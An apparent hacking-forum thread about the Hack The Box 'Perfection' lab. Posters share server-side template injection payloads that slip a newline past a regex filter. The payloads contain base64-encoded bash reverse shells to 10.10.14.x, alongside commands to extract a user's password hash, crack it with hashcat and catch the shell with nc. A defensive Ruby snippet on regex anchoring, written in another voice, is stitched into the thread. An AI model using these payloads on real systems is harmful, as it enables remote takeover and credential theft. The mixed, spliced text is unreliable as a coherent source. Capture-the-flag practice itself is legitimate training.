Posts: 22
Threads: 5
Joined: Mar 2024
(Mar 05, 2024, 04:25 AM)K4dln Wrote: (Mar 02, 2024, 08:05 PM)jahman Wrote: You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. Here is a payload:
category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+
Then you have to find susan's password hash in the /home/susan/Migration/pupilpath_credentials.db file:
strings /home/susan/Migration/pupilpath_credentials.db
The format of the password is in /var/spool/mail/susan. You can crack it with hashcat in mask mode:
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
I'm listening (ip vpn h7b): nc -lvnp 4444
My Burp code:
POST /weighted-grade-calc HTTP/1.1
Host: 10.129.217.20
Content-Length: 295
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.217.20
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.217.20/weighted-grade
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
grade1=12&weight1=12&category2=123&grade2=12&weight2=12&category3=khbj&grade3=12&weight3=12&category4=dfwdf&grade4=12&weight4=12&category5=sdfsd&grade5=12&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQ0NDQgMD4mMSI=+|+base64+-d+|+bash");%25>
But it doesn't work... WHYYYY???
Help me please
Check out this video: https://youtu.be/cQlb4C8WUG4
Also, you don't need to base64-encode your payload. You can wrap it in backticks: `payload`. Make sure you URL-encode special characters. Also, you can use a python3 payload.
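An added example (not code from this thread or from the box) of why a newline gets past the regex filter jahman mentions, written from the fixing side. It assumes the filter is a Ruby regex anchored with ^ and $ on the category field, which the thread does not show, and contrasts it with \A and \z anchoring.

```ruby
# Added example: anchoring mistakes that let a "%0A" (newline) through
# input validation in Ruby, and the fix.
# Assumption: the category filter looks like /^[a-zA-Z0-9]+$/; the real
# code of the box is not shown in the thread.

# In Ruby, ^ and $ match at LINE boundaries inside the string, so a value
# only needs one line that satisfies the pattern to be accepted.
WEAK_CATEGORY = /^[a-zA-Z0-9]+$/.freeze

# \A and \z anchor to the start and end of the WHOLE string, so any
# embedded newline (or anything after it) causes a rejection.
STRICT_CATEGORY = /\A[a-zA-Z0-9]+\z/.freeze

def weak_valid?(value)
  WEAK_CATEGORY.match?(value)
end

def strict_valid?(value)
  STRICT_CATEGORY.match?(value)
end

# Constructed sample inputs: a plain category name, and the URL-decoded
# form of "Maths%0A<%= ... %>" as posted above, with a harmless expression.
PLAIN = "Maths"
MULTILINE = "Maths\n<%= 1 + 1 %>"

if __FILE__ == $PROGRAM_NAME
  [PLAIN, MULTILINE].each do |v|
    puts "#{v.inspect}: weak=#{weak_valid?(v)} strict=#{strict_valid?(v)}"
  end
end
```

The weak pattern accepts the multi-line value because "Maths" alone satisfies ^...$ on the first line; the strict pattern rejects it.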
Posts: 24
Threads: 1
Joined: Nov 2023
OK, for Burp Suite, use the command below:
category1=Maths%0A<%25%3d+`ls+lh`+%25>&grade1=5&weight1=60&category2=english&grade2=50&weight2=fr&category3=chemistry&grade3=5&weight3=5&category4=5&grade4=5&weight4=5&category5=5&grade5=5&weight5=5
Replace ls+lh with your reverse shell command; after selecting your command, URL-encode it (Ctrl+U on the keyboard).
Posts: 12
Threads: 1
Joined: Jan 2024
Mar 07, 2024, 10:02 PM
(This post was last modified: Mar 07, 2024, 10:04 PM by ballzach.)
Extremely thorough walkthrough covering literally every aspect of this box from A-Z!
... Shall I say... IT IS PERFECTION!!
https://breachforums.cx/Thread-HTB-PERFE...ALKTHROUGH
https://rentry.co/HTB-Perfection-Walkthrough
^^ Free & open source paste bin. Formatted nicely using markdown.
I really spent 3 days on this trying to cover every aspect, because I saw so many new users and newbie hackers/pentesters posting so many basic questions in the main thread, and no one was explaining the methodology or reasoning behind them.
I enjoy doing this too, because it helps me also.
If you can leave respect on here or whatever, please do if you find it useful.
Leave thoughts & notes, sorry it's late!
Posts: 119
Threads: 10
Joined: Jan 2024
(Mar 07, 2024, 10:02 PM)ballzach Wrote: Extremely thorough walkthrough covering literally every aspect of this box from A-Z!
... Shall I say... IT IS PERFECTION!!
https://breachforums.cx/Thread-HTB-PERFE...ALKTHROUGH
https://rentry.co/HTB-Perfection-Walkthrough
^^ Free & open source paste bin. Formatted nicely using markdown.
I really spent 3 days on this trying to cover every aspect, because I saw so many new users and newbie hackers/pentesters posting so many basic questions in the main thread, and no one was explaining the methodology or reasoning behind them.
I enjoy doing this too, because it helps me also.
If you can leave respect on here or whatever, please do if you find it useful.
Leave thoughts & notes, sorry it's late!
Amazing. Thanks for sharing. Bravo!
Posts: 31
Threads: 0
Joined: Sep 2023
(Mar 07, 2024, 10:02 PM)ballzach Wrote: Extremely thorough walkthrough covering literally every aspect of this box from A-Z!
... Shall I say... IT IS PERFECTION!!
https://breachforums.cx/Thread-HTB-PERFE...ALKTHROUGH
https://rentry.co/HTB-Perfection-Walkthrough
^^ Free & open source paste bin. Formatted nicely using markdown.
I really spent 3 days on this trying to cover every aspect, because I saw so many new users and newbie hackers/pentesters posting so many basic questions in the main thread, and no one was explaining the methodology or reasoning behind them.
I enjoy doing this too, because it helps me also.
If you can leave respect on here or whatever, please do if you find it useful.
Leave thoughts & notes, sorry it's late!
Damn, this is so cool!